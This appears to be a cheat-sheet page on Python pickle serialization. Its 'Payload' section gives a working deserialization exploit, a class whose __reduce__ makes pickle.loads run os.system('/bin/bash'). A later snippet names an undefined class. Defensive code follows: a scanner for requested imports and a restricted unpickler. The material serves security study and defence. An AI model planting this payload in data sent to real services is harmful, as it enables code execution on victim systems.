# Pickle

Serializes a Python object into a byte stream and back.

When sending pickled data over a network, base64-encode it first so that special characters in the byte stream do not cause unexpected behavior.

```python
import pickle
import base64

text = "Hello, World!"
pickled = pickle.dumps(text)
send_data = base64.b64encode(pickled)       # encode before sending
receive_data = base64.b64decode(send_data)  # decode on receipt
unpickled = pickle.loads(receive_data)      # load what was received
```

## Payload

The following payload can be injected into a pickled object. When the object is unpickled, `pickle.loads` calls the callable returned by `__reduce__` with the given arguments.

```python
import pickle
import os
import base64


class evil_object(object):
    def __reduce__(self):
        # Callable and argument tuple that the unpickler will invoke
        return (os.system, ('/bin/bash',))


x = evil_object()
y = pickle.dumps(x)
base64.b64encode(y)
```

* Dump serialized object via

```python
with open('pickled.out', 'wb') as f:
    pickle.dump(SerializedPickle(), f)
```
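
On the receiving side, the payload works because the unpickler imports and calls whatever the byte stream names. The following is an added example, not code from the original page: it lists the imports a pickle requests without loading it, then refuses them with a restricted `Unpickler`. The names `ALLOWED_GLOBALS`, `referenced_globals`, `safe_loads` and `Probe` are assumptions, and the samples are constructed.

```python
import base64
import io
import os
import pickle
import pickletools

ALLOWED_GLOBALS = set()  # assumption: only built-in data is exchanged; add (module, name) pairs

def referenced_globals(data):
    """List the (module, name) imports a pickle requests, without loading it."""
    found, strings, memo, top = [], [], {}, None
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("GLOBAL", "INST"):        # protocols 0-3: "module name"
            found.append(tuple(arg.split(" ", 1)))
            top = None
        elif op.name == "STACK_GLOBAL":          # protocol 4+: names pushed earlier
            found.append(tuple(strings[-2:]))
            top = None
        elif op.name == "MEMOIZE":
            memo[len(memo)] = top
        elif op.name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = top
        else:
            is_get = op.name in ("GET", "BINGET", "LONG_BINGET")
            top = memo.get(arg) if is_get else arg
            if isinstance(top, str):
                strings.append(top)
    return found  # triage aid only; RestrictedUnpickler is the enforcement

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"blocked global {module}.{name}")
        return super().find_class(module, name)

def safe_loads(b64_data):
    """Base64-decode, then unpickle with non-allowlisted imports refused."""
    return RestrictedUnpickler(io.BytesIO(base64.b64decode(b64_data))).load()

class Probe:
    """Constructed sample: same __reduce__ shape as the payload, harmless callable."""
    def __reduce__(self):
        return (os.getpid, ())

SAMPLE_TEXT = base64.b64encode(pickle.dumps("Hello, World!"))
SAMPLE_REDUCE = base64.b64encode(pickle.dumps(Probe()))

if __name__ == "__main__":
    print(referenced_globals(base64.b64decode(SAMPLE_REDUCE)), safe_loads(SAMPLE_TEXT))
```

The opcode scan is a heuristic for logging and triage; the `find_class` override is what actually blocks the import at load time.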